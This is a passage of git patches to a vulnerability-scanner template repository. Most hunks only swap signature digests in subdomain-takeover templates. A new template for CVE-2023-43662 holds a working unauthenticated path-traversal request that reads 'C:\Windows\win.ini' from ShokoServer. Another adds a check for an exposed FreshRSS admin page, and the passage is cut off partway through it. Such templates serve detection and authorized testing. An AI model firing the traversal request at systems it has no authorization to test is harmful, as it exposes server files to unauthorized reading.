4a0a00473045022100934d069e3bf75bd8206fbf531673a2d73e303c35f6a572ba6086c22a1f7b1ab402204e9b7508bb47942f8d3575b0284ca41734db910ce460d81cb9a1604d6c9a00db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220732156d1b9aee886159e995ecd55ca73d7ae60177540614140e22c526116a8b9022100e9e31b3efa3ab452698d76f088c1167b6935b91b6c30076b65fa8c541e88591d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index d750ec25ea..9c6f7b1905 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a004730450221008c7dd4e22a1d4fde29ea63656635b7adbc8f5abf044130945e4a69df607215c00220629314f1d78cd8df1bde642f05b1febd922fd801bfbf4e5980a29defe2a57e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048ea276c13dbe247323fe0749c5845c51cdb16cdec2b6bf04d57d8643ad08cb9022100b8e7fe45ce7a053e52bfb1c7a9ded57f284a8db0fcb2f16d90328841afeeeff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index 6c26ca21cd..2f07f45d17 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100b2bc3e8ad65a671ca4425f64dd44280a4809d55718706a6f6f005a5ee28d7420022100a00a7a1e403a95d522aa6fbe0fc30e92505eac559c53a8503cbb574c6b5e32af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057df5ea1718c4f35a1b6dd93abede167473c1bf2755948431ed59b6bf510a8b7022100b73cbb88ac0e23bf26b1eb9c5494001e1262b096c9d667f0e5dd4b063fcb3e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index 44b0783c34..834752e0cb 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022034258f2fca01e39007e9d33458f41536b1903c50ed5ddacba8805bfded9c10b80220441b9f318c24301fdeaf66b9e1fe593a01aa1988cbb0b3fed8fd2c456336a667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a24a5a98e7b5b6b4890ec674839802c9184cb681f198d79af13c38e7aa6eaad60220033dd3a7ca07abef878609d3ac39c0c2c67ecc00874513a253cde96fbda5232f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readme-takeover.yaml b/http/takeovers/readme-takeover.yaml index e486ff28b9..36d6dae196 100644 --- a/http/takeovers/readme-takeover.yaml +++ b/http/takeovers/readme-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100ce949e30e457000311f37d3f507775ffb4ad50c2b614cf12956ce4e7805bf313022100a1f155c7443b863e38dbe30ba9b02e94aa7504be85e029d837887d7c25d2a045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e6d58e97a10ffadee9fbe90d74aed2d47d8bc17e3d50a673f969943bcdff0a40022100ad45b7dcc14791927dd9a12865abb78779fdb797846177407a8c41041a4f6b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readthedocs-takeover.yaml b/http/takeovers/readthedocs-takeover.yaml index eb448090fe..e360e61592 100644 --- a/http/takeovers/readthedocs-takeover.yaml +++ b/http/takeovers/readthedocs-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402205b73bb8a1171ae52b384c6eb817ed2be50e3e243f754c2f19806a5d4ae45a35f02205fd4870a807fb475b6e1322e6135385950d8b1ecca8e5fbfcea83c1b364362a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d97d99ad6953260fc8ce645e5ed676c8c6568c6eaff2f9b9e5fdad72d4a16ea202207f8605bddb51019968b07639f84984519294a1494a9b67cc11f3205561464d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml index 9a720d38a1..566d3ca682 100644 --- a/http/takeovers/shopify-takeover.yaml +++ b/http/takeovers/shopify-takeover.yaml @@ -46,4 +46,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a004730450220204856f7e988020fdcb4ae366636d5955319303a33a7b6e83099bef036aa4c72022100b0d493e583dcb4b1d9db9197368a4405bef1b303b74fcc3abe8b99fe13ff46e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aac1f28832a6a49c0ccf1d311b0ab7609cd47c6e9885956cbf1523fffa2b76f0220359220005b426a8a9777faec36abe58bed2e53e8a0cebc644c4a70231be14fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/short-io.yaml b/http/takeovers/short-io.yaml index d6984ccdfe..53a706d9cc 100644 --- a/http/takeovers/short-io.yaml +++ b/http/takeovers/short-io.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402200547045a93bd650f749334f481c7e85b6b70c5bda668debc7edc236f405f2170022022336404658166b4297713e33a77f79de3c3cca8f25630301b2e4c90b2778c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b1b0af9fcad4233cc6a816d1ba982629415f11e2561e42c24dcdc4f698c25e34022100ecb479d9a5a22c389f2298c640f833f247ac881dd5532dcfc34987b543d16624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/simplebooklet-takeover.yaml b/http/takeovers/simplebooklet-takeover.yaml index 6c92ab6992..91b8fecb93 100644 --- a/http/takeovers/simplebooklet-takeover.yaml +++ b/http/takeovers/simplebooklet-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100ec8a2d5fa51dea56e883426cf67a8d347db6169360c9336c06f36bf5f09efede022100f5157c422980294a6369eaf2c985ae49681e7a1438c5ee44e4b42497bed2b161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b145f0a5215114a2451596e94cf888b553d336f6094b1d460bd1e9d349c49ac00220798e62d876d74f067b16e5ba041bc755ca30389a18c740806b1fadb02cbbfe61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smartjob-takeover.yaml b/http/takeovers/smartjob-takeover.yaml index 48accc5caf..5b85ca23c7 100644 --- a/http/takeovers/smartjob-takeover.yaml +++ b/http/takeovers/smartjob-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502206d2af6a49847e8d78c4804f876d0ccda8d71bdbe74d91a0a9d3e9c074428b07c022100e95814e3f5de541f6c2a0da04d93f11fb16fcd17a1db33c638d383e6ff9d9e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de4b229e65cf3f1278cd8c2c457ded5dae24ff7fceb073181d82c109ca33cbac02202b8ceaea8361bf8f98ec10ded9c13e9d27340d1158e16ed4fec0b384246c221c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smugmug-takeover.yaml b/http/takeovers/smugmug-takeover.yaml index d9d54e2d31..0d2b525638 100644 --- a/http/takeovers/smugmug-takeover.yaml +++ b/http/takeovers/smugmug-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100b1226725e7147551cc8b60993b4c27b9404d7c216e70d947284e74f11f59f0b402200d4046e85887737a8f83988735889b386beaed3dc3011dd2832b5a038810ee4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f09cf9df6e1b144370dbe7335af6083040e650d8ba0d8123ae52602e99fa134002203f771e160e09068b570977293c2c310a76a28caef5b60635846067dc3b56cd69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/softr-takeover.yaml b/http/takeovers/softr-takeover.yaml index 7d1b8213a6..1f7090764e 100644 --- a/http/takeovers/softr-takeover.yaml +++ b/http/takeovers/softr-takeover.yaml @@ -36,4 +36,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100f773bd5a97c78de8be263cdf809ec456f7c2eb6b32f2486fb1e61a99d2cd51fb02201bfdd4f5a49437f0edcee10f3c62c501e26f12289b66e2ceb03200b2c14511c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086e2fd8f226adeb1e58b5e11c9d59e78125a86c081a72a1a85c95ea073d0e206022056238e85c3b5ec080c0bd773b93bac8d865e09416a2a2efd7ee06ea24bf24c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/sprintful-takeover.yaml b/http/takeovers/sprintful-takeover.yaml index 42cdbae969..1f5dc07295 100644 --- a/http/takeovers/sprintful-takeover.yaml +++ b/http/takeovers/sprintful-takeover.yaml @@ -39,4 +39,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402202faae6dd1e1075349daf0b9382c13500e2c12d16a131791a95c98e025a80543202200a4d444f499455ad564b5cf9be22d31ce9e001595e92ab77b2b91e4160940d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021c31ca0dd6de907243c0a8951c3d419e7f4a7edcf31a578783bdf8219fa02fe02210097ec0cec1b96d945b292dfce7ba8569e5ff639de2ff2679957cc57b268d99535:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index b1f7204f67..eeaa717882 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -38,4 +38,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a004830460221009bd4e2c96f378728a169b30d9f8dbb6709bb0b212fd48297c86d27d05bf8e6e0022100b8618a8aa2e41507730211937599b02a39cce1b8662ae0da5f0ea632ee222517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220370c5a692d4eb54b3fa681f8fddc4dce658d30d88db88a2740ed199d9bc94b59022100c5e1686e94af14450903b5fd258004dbc1b701558626b3fb83995812b58b6eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/strikingly-takeover.yaml b/http/takeovers/strikingly-takeover.yaml index da94fe5957..205b1340b4 100644 --- a/http/takeovers/strikingly-takeover.yaml +++ b/http/takeovers/strikingly-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a004830460221009e5d298567c427fc0d1a199cbb2634c5fdc7f11b95dad2657d2314b3675056e5022100d08db1a81efc9de0013e99f5968cb948ee6cca04c57c331bd6aa6d23d194a859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3deadfb33cabbaf36c66a0cad21cf8f2c38e71be890c8b6acd497a60362e2350220692874a4b7410bcf63ecb088adc534d23589634574c72eacb3d8a32abb3e5fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index 7fcb61e0b9..2d27e7cf64 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100c5e76f50cc351a887ab8bbbc9256b132fc7fd3ce128f1107cfa8a3566a8ade57022100bc48b903cb92bea6c0303e77b1d142eacd8dcd1edb4466bc76781f82e171a7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023317d759eda2b9abdf25e28f48ad9fe2bc66f7ced11e7c093a4b6c80ce8b6180220313440c92755cd4b99640b049923bb4a73dd8945cd11567dfa743e33fa9b013c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveygizmo-takeover.yaml b/http/takeovers/surveygizmo-takeover.yaml index bb8a667e63..1aa1f85aa9 100644 --- a/http/takeovers/surveygizmo-takeover.yaml +++ b/http/takeovers/surveygizmo-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502204ac3696d5bb6b669b0d7fd8ac6603a2cc19d89b9f5cf468b9c212938ea1886dc022100c8c75e133f38a8a81eef8cea037b689be65102e87094287ac76f6db0aff68f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020e2fee7f4f6848e84f87eb7f9f79c85882630db6c789bbf96eaf7b2b5679d5c02203d85b42433bf5ac3a84961d838a8b4abb66ce9f4d8381606e65bbbbe8b58defb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveysparrow-takeover.yaml b/http/takeovers/surveysparrow-takeover.yaml index 6cb64cda4b..875663e897 100644 --- a/http/takeovers/surveysparrow-takeover.yaml +++ b/http/takeovers/surveysparrow-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100a5d612e8edd2e7e0be76838eafb7fc5255b09b098f6a5984d80674fae34dbec702202ded396f540ff22e864c5c7584feea766ed7c012d225ff0b6854e487d4368e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018fc57d203be33e3dcf6c2af680282eec1eef4e297a1d79af6df82af1c23564b02207fc4a73c6f78a247c207914a46ee48cfd5da51f560354fae290b9897937f039b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tave-takeover.yaml b/http/takeovers/tave-takeover.yaml index 968c28e08e..79af7f5366 100644 --- a/http/takeovers/tave-takeover.yaml +++ b/http/takeovers/tave-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100f567fa227ec1c59ea5e3cd810ff5fa7165cb404dd5c23c4889fd57a9e8d600320220561e1f08ae5f4a8f8ccb587892a42ae224f67044eac30646fb8e25ce86e56cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea0dbf2e298c25b6cbde54821c66890b8c04290f33df6c39e1ce4d23ec4a8287022100ebb67803528280f7d1146de56064355583c66861c9d4868c0dae5ac1a66fa575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index b725aeeccc..700133189c 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -28,4 +28,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402200c14959578832299911cfd57d60b8d2742088dcd2a6859ee930dca59c18d3d8102201c8783b996d7e0adbe4fb289016896ba02fc9a8b12f0fab47abb54d96a262fb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220212b31588a3bf9adbc6e4558bb1f20e2b58859dba0a44205e774a1f7d590c5c002205eb500a037b808b99c0c35a3d57754200e5d80d1b8c8b874ed522816e40bb996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index 2890024e8e..857db55822 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502202336fcd9a9f8d6c225058e80a03e5698c9aaff69b30cb55f7db16756da443f59022100a1411c4e1c57bd88cb6850e53bb523bf8c33c19d101c2764b7b2e7572a9548bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f9aecbbad3dbdc6779d3a34e3c3e5cb7a4a6ef1f1f24fbcbd6694009281f6940221008d97845aedf4cfec2517de51b44d2ac941e999e8207f0e91fda63b78a2010784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index 7582f8c066..fbc0035d0d 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -39,4 +39,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402206bf1167a9114d4022f618a63a9308698d869c9fa8e51cbf1214b692f4dcd12a4022073558f02e64b15ed6512e98855a6f1d26b9db6d51091ffe75ae2b39fea7cdc3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bfd35bccfbce87fe94c3e445b7d7fb88d1cfe9ba54ac2535c70f365ae12765602205c5b189af200e1e55544c04801588ea3c32d46f45fe6cad5dba55caf86409bb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index 65a6bf2445..673652fe41 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100daf9a1e1c0d06425b0dc3694ebf3bc3765d763ec74894d6108a340b90d9d47360220313466225809ee86d23bde59df5029bdce7aca0d01c64439a428875bd494972a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c8c34cf09088a3f5ea7a2a6c5b90ecf4b651fe72e8354384262977fbcc2f3ef02204930168dacd7947e87f37d96cdbcf44204b1395905e1fab100d58a8ab758acdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index ff825a3537..dc2e1072bc 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402206ae2e4db61257dc700fe2d71b47dfbe0f242e7a9531703ebe3faad83112f25fa02204de1723eed20893ec58a00cb7f0cd7caa2ba0c32cb0fdd897f98626fd8a39677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ee256ff8303277e0793efabe63c1f567845e6f89ce38edb620e7bcb9c145658022100a00a7a76512203d66a4c893d0c6c59612e970e808c5cb193377531f8669cf9b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index db639a465e..cc7e1de8fe 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -41,4 +41,4 @@ http: - type: dsl dsl: - cname -# digest: 490a004630440220107442093374d13645d0fc634dbd22e0f935034d353c5e008af1f425915be41e0220425e7e0dc419aa3b41478ad23144a355d6a91a2b2e2b57ff14075160cef6f917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206be7460d160e77cb11c05ec2a98ad231ae368388af54ece78b7a04d28fe234f3022100e54699fd45cd0b6309c8913a20279bfd85606d4933d51195a9ca716b915d7978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 834de192ce..e85328256c 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022078cb1c9e43356b1552b148b33bf5f893b30896bd5abe83163c7309be3645b321022100ab778902fad53051087acce72732788a6769482f444d888820afd1b18fc1d4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d18cf1c003872034dc42a90718a321f4b9df43bd802847544542260a00dab00022079d7bd2aa1e38ebd91dfb0e0a06cf638e2bde1990f8ca5c346997e917c7ec759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index 282ec0c48f..5db414839f 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022022b0dbe1f5b60787a47074d6cae789b61b13c818f2ca63ce171a19619234fad902205964e2fbce1403f6666f39493673d3a872b6ba0b754e33dde78521d860fbd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220012d34753f0fbc14aa4e59f9b995690c0a077ede1dd4f3aa0c3fe24e1b10abae022100f0efe205560bb25c65b793026d3b737e48f990d1263df56c9efe869cc7caa4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index 73390570a6..69c1c2d6cc 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a0048304602210083675b02f7c8e221e2d34f7d84d811f5e4fc33bd8efd54d643bf93e50eab8c8e022100814989f73d6a81f313d461120e8267717dea9e516ee28e9489f067bb462d7f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f49fae77e7b3baef7855bf1f7c97a8201d6cdbb9a9e273e8aa3e2b6bcc18fe4b02210084614f5dd4503bcffcc3e0c4732fba1c00f9f6ea8cc26464433faff6fe854e68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index 4af77e6e28..61b9c88969 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -36,4 +36,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100a0cd6884c061b436ce7561a8d58fd8854b9c2c170c58015efba8998235279be902210095a56be16d9ddb30e7ff4524c444d5337b8952e5dc963380d83bb061d9091a7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d1b8e937e584786455f39d606e5dc985eb93aa481cdd4a88ac7a2726f0ae85602206418df37d6ed5738547ee70f2fcdd11852fcea6555cb5262e49939624e38c943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index 86a551db79..a3e8c304b4 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -38,4 +38,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402200e210350415af8d696a974aad4b7afad97e09eb49b626d286ba49bfc002c57d102202c34a0126212979cb71c47da6b0a283c71c61f4aba18f41b8bdbec5b70c10328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089bf64782d123d37de2505b8087526da645b69700527f561bc080e033bdc642302202f3ac993226cafee5c89fad238076e158343bac55f59348e3271c7df2f6a507a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index 9cb89b3df4..552487fc97 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -48,4 +48,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022015e2656c9f329d20fd4891ffcb9834632dac58c492aa84ac9c1666ee62136621022100a36e344c48be6ee62f9f857801310f73f405cd9b5df22503a00171ea141b17c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d7ff8f0bc643ef971aecf4234c610dc104acd170978f53ceaa26e53651c0025022070fc726709fdd4512ff4b7e05c02a56d53ad2262853b6a66ab563843a02bd89d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index 33aae0f52b..dfeebb9759 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502201d2109545256fa0c6655011f8c2109fa145b39721cb7fd66b54240071e31dbed022100fb299c8eeb837c84fbb26d69c8c805d8add5b67d09e6a7b8a9ca73dd7cd77233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f33f02cad68d4faf18b0c9f17f53e98fd8081262fb2db8cc5e4e713ec554371022100b81136a58ad747499458c8e007629821a422096bb5e8002354c05dcd70d9884a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index f3980b2d5c..445dabef15 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100a3eb6a6435a19adedbce449af23b505508d27a492504f2b6de496d0ea53d2dec022100ea6e2f16a078c3406b623e4c67bd1ee41c4273bef10fe48f8fee50f5cc35822a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d9420b7cd81ee2181052c35398327050fd8834af6fe245b116a08eb4437b48802202c89cd8b2f61fd56f5fd342d628f6856df3c15e503572bf5aec338f3a2d46b10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f49778e222f1266925396af84b2f54f9bd5ac7d0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 17 Jul 2024 20:52:52 +0530 Subject: [PATCH 1335/1841] Create CVE-2023-43662.yaml --- http/cves/2023/CVE-2023-43662.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43662.yaml diff --git a/http/cves/2023/CVE-2023-43662.yaml b/http/cves/2023/CVE-2023-43662.yaml new file mode 100644 index 0000000000..8b031b3aa0 --- /dev/null +++ b/http/cves/2023/CVE-2023-43662.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-43662 + +info: + name: ShokoServer System - LFI + author: pussycat0x + severity: high + description: | + ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. The `/api/Image/WithPath` endpoint has been removed in commit `6c57ba0f0` which will be included in subsequent releases. Users should limit access to the `/api/Image/WithPath` endpoint or manually patch their installations until a patched release is made. This issue was discovered by the GitHub Security lab and is also indexed as GHSL-2023-191. + reference: + - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + - https://github.com/ShokoAnime/ShokoServer/commit/6c57ba0f073d6be5a4f508c46c2ce36727cbce80 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2023-43662 + cwe-id: CWE-22 + epss-score: 0.00089 + epss-percentile: 0.38539 + cpe: cpe:2.3:a:shokoanime:shokoserver:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: shokoanime + product: shokoserver + fofa-query: title="Shoko WEB UI" + tags: cve,cve2023 + +http: + - method: GET + path: + - '{{BaseURL}}/api/Image/withpath/C:\Windows\win.ini' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200 From 1e0ea75b011a8fecaf0555de703009447ccecf08 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:08:34 +0530 Subject: [PATCH 1336/1841] Create freshrss-unauth.yaml --- http/misconfiguration/freshrss-unauth.yaml | 32 ++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/freshrss-unauth.yaml diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml new file mode 100644 index 0000000000..a7591995a3 --- /dev/null +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -0,0 +1,32 @@ +id: freshrss-unauth + +info: + name: Freshrss Admin Dashboard - Exposed + author: ritikchaddha + severity: high + description: | + Freshrss Admin Dashboard has been exposed. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Freshrss" + tags: freshrss,misconfig,unauth,exposed + +http: + - method: GET + path: + - "{{BaseURL}}/i/?a=logs" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'a=logout' + - 'FreshRSS' + - 'Profil
